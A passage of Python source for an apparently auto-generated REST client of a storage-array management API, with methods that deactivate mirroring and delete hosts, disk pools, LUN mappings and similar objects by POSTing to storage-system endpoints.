        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_deactivate_histogram" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_deactivate_histogram`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_deactivate_histogram`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deactivateHistogram'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_deactivate_mirroring(self, system_id, **kwargs):
    """Deactivate Remote Mirroring.

    Documented SYMbol return codes: ok, illegalParam, noHeap, tryAlternate,
    internalError, iconFailure, mirrorsPresent, rvmFibreError.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_deactivate_mirroring" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_deactivate_mirroring`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deactivateMirroring'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=None,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_deassign_drives_as_hot_spares(self, system_id, body, **kwargs):
    """Deassign the given drives as hot spares.

    The drives return to the pool of unassigned drives and are added to the
    unconfigured capacity pool of the storage array. A hot spare currently in
    use (sparing for a failed drive) cannot be deassigned.
    Documented SYMbol return codes: ok, illegalParam, tryAlternate,
    noSparesDeassigned, someSparesDeassigned.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param DriveRefList body: DriveRef values identifying all drives affected
        by this operation. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_deassign_drives_as_hot_spares" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_deassign_drives_as_hot_spares`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_deassign_drives_as_hot_spares`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deassignDrivesAsHotSpares'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_async_mirror_group(self, system_id, body, **kwargs):
    """Delete an Async Mirror Group (AMG).

    Documented SYMbol return codes: ok, arvmGroupDoesNotExist,
    arvmGroupNotEmpty, remoteInternalError, remoteDatabaseError,
    arvmRemoteGroupNotEmpty, remoteTryAlternate, arvmOnlyLocalAmgDeleted.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param AsyncMirrorGroupDeletionDescriptor body: All required attributes to
        delete an Asynchronous Mirror Group. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_async_mirror_group" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_async_mirror_group`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_async_mirror_group`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deleteAsyncMirrorGroup'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_async_mirror_group_incomplete_member(self, system_id, body, **kwargs):
    """Clean up a mirror "place holder" (incomplete AMG member).

    Documented SYMbol return codes: ok, invalidIncompleteMemberRef,
    arvmGroupNotSecondary, remoteInternalError,
    arvmRemoteMirrorMemberDoesNotExist, arvmRemoteGroupDoesNotExist,
    remoteDatabaseError.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param str body: All required attributes to delete an incomplete member of
        an Asynchronous Mirror Group. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_async_mirror_group_incomplete_member" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_async_mirror_group_incomplete_member`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_async_mirror_group_incomplete_member`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deleteAsyncMirrorGroupIncompleteMember'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_cgpit(self, system_id, body, **kwargs):
    """Delete a PiT in one or more members of a consistency group.

    Documented SYMbol return codes: ok.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param PITConsistencyGroupPITDeletionDescriptor body: Information about
        the consistency group PiT to delete. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_cgpit" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_cgpit`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_cgpit`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deleteCGPIT'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_cluster(self, system_id, body, **kwargs):
    """Delete a Cluster object from the Storage Partitions configuration.

    Documented SYMbol return codes: ok, partNodeNonexistent.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param str body: The ClusterRef value for the cluster to be deleted. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_cluster" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_cluster`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_cluster`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deleteCluster'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_disk_pool(self, system_id, body, **kwargs):
    """Delete a disk pool and all volumes in that pool.

    Documented SYMbol return codes: ok, diskPoolNotEmpty.
    The request is synchronous unless a `callback` callable is supplied, in
    which case the request runs on a worker thread and that thread is returned.

    :param str system_id: The unique identifier of the storage-system; may be
        the id or the WWN. (required)
    :param str body: A reference to the volume group to be deleted. (required)
    :param str controller: Controller selection (optional)
    :param bool verbose_error_response: (optional)
    :param callback: Callable invoked with the response when asynchronous. (optional)
    :return: str, or the request thread when called asynchronously.
    :raises ValueError: if a required parameter is missing.
    :raises TypeError: on an unexpected keyword argument.
    """
    recognized = ('controller', 'verbose_error_response', 'callback')
    for keyword in kwargs:
        if keyword not in recognized:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_disk_pool" % keyword
            )
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_disk_pool`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_disk_pool`")

    # Optional keyword arguments map onto REST query parameters.
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = self.api_client.select_header_content_type(['application/json'])

    resource_path = '/storage-systems/{system-id}/symbol/deleteDiskPool'.replace('{format}', 'json')
    return self.api_client.call_api(resource_path, 'POST',
                                    {'system-id': system_id},
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_flash_cache(self, system_id, body, **kwargs):
    """
    Delete a flash cache from the storage system.

    Removes the High Level Volume and the RAID Volumes on the SSD, and
    disables flash caching on any associated user volumes.
    Documented return codes: ok, error, noHeap, internalError,
    invalidVolumeref, notFlashcacheVol, flashcacheDeleted.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: A reference to the flash cache object to delete. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_flash_cache" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_flash_cache`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_flash_cache`")

    resource_path = '/storage-systems/{system-id}/symbol/deleteFlashCache'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_host(self, system_id, body, **kwargs):
    """
    Delete a Host object from the Storage Partitions configuration.

    Documented return codes: ok, partNodeNonexistent.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: The HostRef value for the host to be deleted. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_host" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_host`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_host`")

    resource_path = '/storage-systems/{system-id}/symbol/deleteHost'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_host_port(self, system_id, body, **kwargs):
    """
    Delete a HostPort object from the Storage Partitions configuration.

    Documented return codes: ok, partNodeNonexistent.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: The HostPortRef value for the host port to be deleted. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_host_port" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_host_port`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_host_port`")

    resource_path = '/storage-systems/{system-id}/symbol/deleteHostPort'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_initiator(self, system_id, body, **kwargs):
    """
    Delete an initiator object.

    Documented return codes: ok.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: A ScsiNodeRef object that identifies the initiator to delete. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_initiator" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_initiator`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_initiator`")

    resource_path = '/storage-systems/{system-id}/symbol/deleteInitiator'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_key_value_tag(self, system_id, body, **kwargs):
    """
    Remove the specified key-value tags from the array.

    It is an error to remove in-use key-value tags.
    Documented return codes: ok.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param KeyValueTagRefList body: The input identifies the key-value pairs to be deleted from the array. Unknown references are ignored. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_key_value_tag" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_key_value_tag`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_key_value_tag`")

    resource_path = '/storage-systems/{system-id}/symbol/deleteKeyValueTag'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_key_value_tag_mapping(self, system_id, body, **kwargs):
    """
    Remove all references to specific Key-Value tags from the specified
    volumes.

    Documented return codes: ok.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param KeyValueTagMappingDeletionDescriptorList body: The input is a list of references to Volumes (or Workloads). For each in the list, all references to Key-Value tags are deleted. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_key_value_tag_mapping" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_key_value_tag_mapping`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_key_value_tag_mapping`")

    resource_path = '/storage-systems/{system-id}/symbol/deleteKeyValueTagMapping'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_lun_mapping(self, system_id, body, **kwargs):
    """
    Delete a LUNMapping object from the Storage Partitions
    configuration.

    Documented return codes: ok, partNodeNonexistent.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param str body: The LUNMappingRef value for the mapping to be deleted. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_lun_mapping" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_lun_mapping`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_lun_mapping`")

    resource_path = '/storage-systems/{system-id}/symbol/deleteLUNMapping'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
        self.api_client.select_header_content_type(['application/json'])

    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body,
                                    post_params=[],
                                    files={},
                                    response_type='str',
                                    auth_settings=['basicAuth'],
                                    callback=kwargs.get('callback'))
def symbol_delete_mgmt_client_records(self, system_id, body, **kwargs):
    """
    Delete a range of (i.e. one or more) specified MgmtCleintRecords.

    Documented return codes: ok, noHeap, volumeNotExist, databaseError.

    The request is synchronous by default; pass a `callback` keyword
    argument to run it asynchronously, in which case the request thread
    is returned and the callback is invoked with the response.

    :param str system_id: The unique identifier of the storage-system. This may be the id or the WWN. (required)
    :param MgmtClientRecordDeleteDescriptor body: The MgmtClientRecordDeleteDescriptor value. (required)
    :param str controller: Controller selection
    :param bool verbose_error_response:
    :param callback: Optional function invoked with the response.
    :return: str, or the request thread when called asynchronously.
    :raises: ValueError if a required parameter is missing or the
        response format is unknown; TypeError on an unexpected keyword
        argument or response type; ApiException on HTTP errors (422+).
    """
    accepted = ('system_id', 'body', 'controller', 'verbose_error_response', 'callback')
    # Reject unknown keyword arguments before doing anything else.
    for arg_name in kwargs:
        if arg_name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method symbol_delete_mgmt_client_records" % arg_name
            )
    # Both positional parameters are mandatory and may not be None.
    if system_id is None:
        raise ValueError("Missing the required parameter `system_id` when calling `symbol_delete_mgmt_client_records`")
    if body is None:
        raise ValueError("Missing the required parameter `body` when calling `symbol_delete_mgmt_client_records`")

    resource_path = '/storage-systems/{system-id}/symbol/deleteMgmtClientRecords'
    path_params = {'system-id': system_id}

    # Optional query-string parameters (note the camelCase wire name).
    query_params = {}
    if 'controller' in kwargs:
        query_params['controller'] = kwargs['controller']
    if 'verbose_error_response' in kwargs:
        query_params['verboseErrorResponse'] = kwargs['verbose_error_response']

    # Negotiate JSON both ways; omit Accept when nothing is selectable.
    header_params = {}
    accept = self.api_client.select_header_accept(['application/json'])
    if accept:
        header_params['Accept'] = accept
    header_params['Content-Type'] = \
